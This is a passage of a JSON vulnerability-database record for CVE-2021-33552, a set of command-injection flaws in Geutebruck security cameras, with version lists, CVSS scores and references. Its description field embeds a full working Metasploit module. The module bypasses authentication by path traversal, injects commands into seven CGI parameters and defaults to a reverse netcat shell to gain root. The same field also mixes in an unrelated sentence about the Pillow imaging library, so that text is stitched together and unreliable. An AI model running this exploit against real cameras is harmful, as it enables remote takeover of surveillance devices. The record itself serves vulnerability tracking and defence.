"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ebc-2112",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2250",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2275",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code een-2040",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2271",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ebc-2111",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2239",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2230",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ethc-2249",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-code een-2010",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam efd-2241",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2110",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code een-2040",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ewpc-2271",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ebc-2111",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2239",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2250",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2249",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2230",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2270",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-code eec-2400",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-code een-2010",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2241",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2240",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam efd-2251",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ethc-2230",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2241",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code eec-2400",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2270",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2249",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code eec-2400",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2240",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam efd-2251",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2275",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2112",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ewpc-2270",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ewpc-2275",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ebc-2110",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam efd-2250",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam efd-2251",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2240",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code een-2040",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2112",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2271",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2111",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ethc-2239",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "\u2025 * firmware 1.12.13.2 1.12.14.5"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* een-20xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* efd-22xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* ethc-22xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "\u2025 * g-cam"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* eec-2xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "works with the above firmware s e2 series camera models encoders"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": null
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* ebc-21xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "\u2025 * g-code"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "( multiple products )"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* ewpc-22xx"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "NVD",
"id": "CVE-2021-33552"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Titouan Lazard and Ibrahim Ayadhi from RandoriSec reported these vulnerabilities to CISA.",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202107-2085"
}
],
"trust": 0.6
},
"cve": "CVE-2021-33552",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CVE-2021-33552",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.2,
"id": "CVE-2021-33552",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "OTHER",
"availabilityImpact": "High",
"baseScore": 7.2,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2021-002023",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-33552",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "info@cert.vde.com",
"id": "CVE-2021-33552",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "OTHER",
"id": "JVNDB-2021-002023",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202107-2085",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202104-975",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2085"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "NVD",
"id": "CVE-2021-33552"
},
{
"db": "NVD",
"id": "CVE-2021-33552"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple camera devices by UDP Technology, Geutebr\u00fcck and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 \u2025 * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. * Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 \u2025 * Arbitrary code executed by command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * By a remote third party counter Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33545 \u2025 * By a remote third party name Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33546 \u2025 * By a remote third party profile Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33547 \u2025 * By a remote third party action Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33549. Pillow is a Python-based image processing library. \nThere is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule \u003c Msf::Exploit::Remote\n Rank = ExcellentRanking\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n \u0027Name\u0027 =\u003e \u0027Geutebruck Multiple Remote Command Execution\u0027,\n \u0027Description\u0027 =\u003e %q{\n This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder\n and exploits multiple authenticated arbitrary command execution vulnerabilities within\n the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx,\n EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions \u003c= 1.12.0.27 as\n well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in\n remote code execution as the root user. \n },\n\n \u0027Author\u0027 =\u003e [\n \u0027Titouan Lazard\u0027, # Of RandoriSec - Discovery\n \u0027Ibrahim Ayadhi\u0027, # Of RandoriSec - Discovery and Metasploit Module\n \u0027S\u00e9bastien Charbonnier\u0027 # Of RandoriSec - Metasploit Module\n ],\n \u0027License\u0027 =\u003e MSF_LICENSE,\n \u0027References\u0027 =\u003e [\n [\u0027CVE\u0027, \u00272021-33543\u0027],\n [\u0027CVE\u0027, \u00272021-33544\u0027],\n [\u0027CVE\u0027, \u00272021-33548\u0027],\n [\u0027CVE\u0027, \u00272021-33550\u0027],\n [\u0027CVE\u0027, \u00272021-33551\u0027],\n [\u0027CVE\u0027, \u00272021-33552\u0027],\n [\u0027CVE\u0027, \u00272021-33553\u0027],\n [\u0027CVE\u0027, \u00272021-33554\u0027],\n [ \u0027URL\u0027, \u0027http://geutebruck.com\u0027 ],\n [ \u0027URL\u0027, \u0027https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/\u0027],\n [ \u0027URL\u0027, \u0027https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03\u0027]\n ],\n \u0027DisclosureDate\u0027 =\u003e \u00272021-07-08\u0027,\n \u0027Privileged\u0027 =\u003e true,\n \u0027Platform\u0027 =\u003e [\u0027unix\u0027, \u0027linux\u0027],\n \u0027Arch\u0027 =\u003e [ARCH_CMD],\n \u0027Targets\u0027 =\u003e [\n [\n \u0027CVE-2021-33544 - certmngr.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e {\n \u0027action\u0027 =\u003e \u0027createselfcert\u0027,\n \u0027local\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n \u0027country\u0027 =\u003e Rex::Text.rand_text_alphanumeric(2),\n \u0027state\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027,\n \u0027organization\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n \u0027organizationunit\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n \u0027commonname\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n \u0027days\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n \u0027type\u0027 =\u003e Rex::Text.rand_text_numeric(2..4)\n },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/certmngr.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33548 - factory.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e { \u0027preserve\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/factory.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33550 - language.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e { \u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/language.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33551 - oem.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e {\n \u0027action\u0027 =\u003e \u0027set\u0027,\n \u0027enable\u0027 =\u003e \u0027yes\u0027,\n \u0027environment.lang\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/oem.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33552 - simple_reclistjs.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e {\n \u0027action\u0027 =\u003e \u0027get\u0027,\n \u0027timekey\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n \u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/simple_reclistjs.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33553 - testcmd.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e { \u0027command\u0027 =\u003e \u0027PLACEHOLDER_CMD\u0027 },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/testcmd.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33554 - tmpapp.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e { \u0027appfile.filename\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/tmpapp.cgi\u0027\n }\n ]\n ],\n \u0027DefaultTarget\u0027 =\u003e 0,\n \u0027DefaultOptions\u0027 =\u003e {\n \u0027PAYLOAD\u0027 =\u003e \u0027cmd/unix/reverse_netcat_gaping\u0027\n },\n \u0027Notes\u0027 =\u003e {\n \u0027Stability\u0027 =\u003e [\u0027CRASH_SAFE\u0027],\n \u0027Reliability\u0027 =\u003e [\u0027REPEATABLE_SESSION\u0027],\n \u0027SideEffects\u0027 =\u003e [\u0027ARTIFACTS_ON_DISK\u0027]\n }\n )\n )\n end\n\n def firmware\n res = send_request_cgi(\n \u0027method\u0027 =\u003e \u0027GET\u0027,\n \u0027uri\u0027 =\u003e \u0027/brand.xml\u0027\n )\n unless res\n print_error(\u0027Connection failed!\u0027)\n return false\n end\n\n unless res\u0026.body \u0026\u0026 !res.body.empty?\n print_error(\u0027Empty body in the response!\u0027)\n return false\n end\n\n res_xml = res.get_xml_document\n if res_xml.at(\u0027//firmware\u0027).nil?\n print_error(\u0027Target did not respond with a XML document containing the \"firmware\" element!\u0027)\n return false\n end\n raw_text = res_xml.at(\u0027//firmware\u0027).text\n if raw_text \u0026\u0026 raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)\n raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)[0]\n else\n print_error(\u0027Target responded with a XML document containing the \"firmware\" element but its not a valid version string!\u0027)\n false\n end\n end\n\n def check\n version = firmware\n if version == false\n return CheckCode::Unknown(\u0027Target did not respond with a valid XML response that we could retrieve the version from!\u0027)\n end\n\n rex_version = Rex::Version.new(version)\n vprint_status(\"Found Geutebruck version #{rex_version}\")\n if rex_version \u003c= Rex::Version.new(\u00271.12.0.27\u0027) || rex_version == Rex::Version.new(\u00271.12.13.2\u0027) || rex_version == Rex::Version.new(\u00271.12.14.5\u0027)\n return CheckCode::Appears\n end\n\n CheckCode::Safe\n end\n\n def exploit\n print_status(\"#{rhost}:#{rport} - Setting up request...\")\n\n method = target[\u0027http_method\u0027]\n if method == \u0027GET\u0027\n http_method_vars = \u0027vars_get\u0027\n else\n http_method_vars = \u0027vars_post\u0027\n end\n\n http_vars = target[\u0027http_vars\u0027]\n http_vars.each do |(k, v)|\n if v.include? \u0027PLACEHOLDER_CMD\u0027\n http_vars[k][\u0027PLACEHOLDER_CMD\u0027] = payload.encoded\n end\n end\n\n print_status(\"Sending CMD injection request to #{rhost}:#{rport}\")\n send_request_cgi(\n {\n \u0027method\u0027 =\u003e method,\n \u0027uri\u0027 =\u003e target[\u0027uri\u0027],\n http_method_vars =\u003e http_vars\n }\n )\n print_status(\u0027Exploit complete, you should get a shell as the root user!\u0027)\n end\nend\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-33552"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "VULMON",
"id": "CVE-2021-33552"
},
{
"db": "PACKETSTORM",
"id": "164036"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-33552",
"trust": 2.7
},
{
"db": "ICS CERT",
"id": "ICSA-21-208-03",
"trust": 1.7
},
{
"db": "PACKETSTORM",
"id": "164036",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU97817785",
"trust": 0.8
},
{
"db": "ICS CERT",
"id": "ICSA-21-208-05",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023",
"trust": 0.8
},
{
"db": "CXSECURITY",
"id": "WLB-2021090031",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021072807",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2550",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2085",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021041363",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975",
"trust": 0.6
},
{
"db": "OTHER",
"id": "NONE",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2021-33552",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2021-33552"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "PACKETSTORM",
"id": "164036"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2085"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "NVD",
"id": "CVE-2021-33552"
}
]
},
"id": "VAR-202109-0848",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "OTHER",
"id": null
}
],
"trust": 0.01
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"camera device"
],
"sub_category": "camera",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
}
]
},
"last_update_date": "2025-01-30T21:38:18.392000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "GEUTEBRUCK \u2019 s\u00a0web\u00a0portal\u00a0 (Login required)",
"trust": 0.8,
"url": "https://portal.geutebrueck.com/"
},
{
"title": "Multiple Geutebr\u00fcck Repair measures for camera device command injection vulnerability",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=158065"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2085"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.0
},
{
"problemtype": "Command injection (CWE-77) [ Other ]",
"trust": 0.8
},
{
"problemtype": " Stack-based buffer overflow (CWE-121) [ Other ]",
"trust": 0.8
},
{
"problemtype": " Lack of authentication for important features (CWE-306) [ Other ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "NVD",
"id": "CVE-2021-33552"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.2,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03"
},
{
"trust": 1.6,
"url": "https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu97817785/"
},
{
"trust": 0.8,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-05"
},
{
"trust": 0.7,
"url": "https://packetstormsecurity.com/files/164036/geutebruck-remote-command-execution.html"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33552"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2550"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021072807"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/issue/wlb-2021090031"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021041363"
},
{
"trust": 0.1,
"url": "https://ieeexplore.ieee.org/abstract/document/10769424"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33543"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33553"
},
{
"trust": 0.1,
"url": "https://github.com/rapid7/metasploit-framework"
},
{
"trust": 0.1,
"url": "https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/\u0027],"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33544"
},
{
"trust": 0.1,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03\u0027]"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33554"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33551"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33548"
},
{
"trust": 0.1,
"url": "https://metasploit.com/download"
},
{
"trust": 0.1,
"url": "http://geutebruck.com\u0027"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33550"
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2021-33552"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "PACKETSTORM",
"id": "164036"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2085"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "NVD",
"id": "CVE-2021-33552"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2021-33552"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "PACKETSTORM",
"id": "164036"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2085"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "NVD",
"id": "CVE-2021-33552"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-07-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"date": "2021-09-02T15:36:40",
"db": "PACKETSTORM",
"id": "164036"
},
{
"date": "2021-07-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202107-2085"
},
{
"date": "2021-04-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"date": "2021-09-13T18:15:23.343000",
"db": "NVD",
"id": "CVE-2021-33552"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-07-29T08:30:00",
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"date": "2022-10-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202107-2085"
},
{
"date": "2021-04-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"date": "2023-11-07T03:35:52.190000",
"db": "NVD",
"id": "CVE-2021-33552"
}
]
},
"threat_type": {
"@context": {
